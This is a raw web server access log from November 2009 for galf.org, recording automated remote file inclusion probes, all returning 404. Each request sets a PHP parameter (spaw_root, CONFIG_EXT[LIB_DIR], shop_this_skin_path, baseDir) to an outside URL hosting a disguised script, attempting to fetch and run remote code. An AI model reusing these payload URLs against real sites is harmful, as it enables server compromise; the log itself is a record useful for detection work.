77.221.130.13 - - [29/Nov/2009:21:47:55 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [29/Nov/2009:21:48:25 -0800] "GET /logs/access.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:48:25 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:48:25 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:48:28 -0800] "GET /phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:48:28 -0800] "GET /logs/phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:48:28 -0800] "GET /logs/access_090720.log%20%20/phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:21:48:35 -0800] "GET /logs/access.log%20%20/phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:50:11 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:50:11 -0800] "GET /logs/access.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [29/Nov/2009:21:50:11 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:21:55:15 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.241 - - [29/Nov/2009:21:55:15 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.241 - - [29/Nov/2009:21:55:15 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:21 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:21 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:21 -0800] "GET /logs/access_091026.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:21:55:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [29/Nov/2009:21:55:22 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [29/Nov/2009:21:55:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:29 -0800] "GET /logs/access_091102.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:29 -0800] "GET /logs/access_090720.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:29 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:29 -0800] "GET /logs/access.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:29 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:52 -0800] "GET /logs/access_091026.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:53 -0800] "GET /logs/access_090921.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:53 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:53 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:53 -0800] "GET /logs/access_090525.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:53 -0800] "GET /logs/access_090817.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:56 -0800] "GET /logs/access_090601.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:56 -0800] "GET /logs/access_091116.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:57 -0800] "GET /logs/access_091019.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:55:57 -0800] "GET /logs/access_090615.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:00 -0800] "GET /logs/access_091102.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:00 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:00 -0800] "GET /logs/access.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:01 -0800] "GET /logs/access_090720.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:01 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:02 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:02 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:03 -0800] "GET /logs/access_091026.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:05 -0800] "GET /logs/access_090914.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:05 -0800] "GET /logs/access_090831.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:05 -0800] "GET /logs/access_090713.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:21:56:08 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [29/Nov/2009:21:56:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.42.146.14 - - [29/Nov/2009:21:56:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:10 -0800] "GET /logs/access_090803.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:10 -0800] "GET /logs/access_091102.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:11 -0800] "GET /logs/access.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:11 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:11 -0800] "GET /logs/access_090907.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:11 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:11 -0800] "GET /logs/access_090720.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:23 -0800] "GET /logs/access_090921.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:23 -0800] "GET /logs/access_090525.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:24 -0800] "GET /logs/access_090817.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:28 -0800] "GET /logs/access_090601.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:28 -0800] "GET /logs/access_091116.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:29 -0800] "GET /logs/access_091019.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:30 -0800] "GET /logs/access_090615.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:31 -0800] "GET /logs/access_090525.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:32 -0800] "GET /logs/access_090921.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:32 -0800] "GET /logs/access_090817.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:34 -0800] "GET /logs/access_090914.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:34 -0800] "GET /logs/access_090831.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:34 -0800] "GET /logs/access_090713.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:35 -0800] "GET /logs/access_090601.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:35 -0800] "GET /logs/access_091116.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:36 -0800] "GET /logs/access_090615.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:36 -0800] "GET /logs/access_091019.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:39 -0800] "GET /logs/access_090803.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:39 -0800] "GET /logs/access_090907.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:41 -0800] "GET /logs/access_090914.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:41 -0800] "GET /logs/access_090713.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:42 -0800] "GET /logs/access_090831.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:47 -0800] "GET /logs/access_090803.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:21:56:47 -0800] "GET /logs/access_090907.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:21:58:01 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.98.136.21 - - [29/Nov/2009:21:58:33 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:21:58:33 -0800] "GET /logs/access_090622.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:21:58:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:21:58:33 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:22:00:48 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:22:01:16 -0800] "GET /logs/access_091026.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:01:16 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:01:16 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:02:08 -0800] "GET /logs/access_091102.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:02:08 -0800] "GET /logs/access_090720.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:02:08 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:22:02:08 -0800] "GET /logs/access.log%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:22:02:08 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.107.65.18 - - [29/Nov/2009:22:02:24 -0800] "GET /logs/access.log/phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:22:02:46 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:22:02:46 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:22:02:46 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:22:02:46 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:22:02:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:22:02:46 -0800] "GET /logs/access_090518.log//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:22:02:47 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [29/Nov/2009:22:03:25 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [29/Nov/2009:22:04:07 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:22:04:51 -0800] "GET /logs/access_090518.log//include/mail.inc.php?skin_board_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.241 - - [29/Nov/2009:22:05:07 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:22:05:37 -0800] "GET /logs/setup.php?setup[use_category]=1&dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:22:05:37 -0800] "GET /logs/access_090921.log/setup.php?setup[use_category]=1&dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.139.66.104 - - [29/Nov/2009:22:05:37 -0800] "GET /setup.php?setup[use_category]=1&dir=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [29/Nov/2009:22:05:45 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [29/Nov/2009:22:06:10 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
